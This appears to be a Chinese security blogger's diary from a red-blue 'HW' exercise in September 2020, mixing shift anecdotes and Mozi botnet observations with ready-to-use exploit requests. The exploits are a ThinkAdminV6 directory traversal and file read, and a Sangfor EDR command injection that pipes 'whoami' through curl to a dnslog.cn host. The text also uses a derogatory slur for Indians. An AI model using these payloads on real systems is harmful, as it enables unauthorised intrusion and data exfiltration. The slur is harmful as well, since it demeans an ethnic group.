HW平安夜: 09/16 风平浪静

没人比我更了解攻击队,他们肯定已经写好投降书了。

我想给大家说个消息:“现在攻击方的分数都不低了”

当你还在创作防守日记

突然身后站着一位攻击队选手正在认真的记着桌面上的VPN登录密码....

1、ThinkAdminV6 任意文件操作

Update.php 三个函数未校验访问权限

1、目录遍历注意POST数据包rules参数值需要URL编码

POST /admin.html?s=admin/api.Update/node

rules=%5B%22.%2F%22%5D

2、文件读取,后面那一串是UTF8字符串加密后的结果。计算方式在Update.php中的加密函数。

/admin.html?s=admin/api.Update/get/encode/

34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b2r33322u2x2v1b2s2p382p2q2p372t0y342w34

2、深信服EDR 远程命令执行

遇到这样的漏洞反手就是一个赞。

/api/edr/sangforinter/v2/cssp/slog_client?token=eyJtZDUiOnRydWV9

{"params": "w=123"'1234123'"|curl `whoami`.dnslog.cn"}

0day预警:

拓尔思TRSWAS5.0文件读取漏洞（CNVD-2020-27769）

网御星云VPN远程命令执行

2020年9月16日 星期三 阴转晴

今天夜班，凌晨2点，发现内网有流量，得到情报说有攻击队向客户内网扔了2个未知0day，客户宁静紧急关停机房，监测平台都打不开了，两眼一摸瞎。

战争已经白热化，没有监测平台，我们防守队依然在，人在客户阵地在，只要我不倒，客户就不会出局。

摸到了兜里的速效救心丸，瞬间安心多了。

---

今天未免也太平静了吧。

刚来交接班看到今天告警平台的流量只有寥寥无几。

感到非常讶异

大多数都是印度阿三扫描的告警

其中有一条是中国浙江的IP同样也是这种数据包。

我简单分析了一下

这个恶意程序Mozi,如果被入侵成功后

迅速变成僵尸网络的一个节点,最终组建成庞大僵尸网络

很显然浙江的IP已经被控制变成了傀儡机

不断的向其他网段发起扫描

感觉有意思的来了

那这次Hvv 会不会升级成一场国际网络战争呢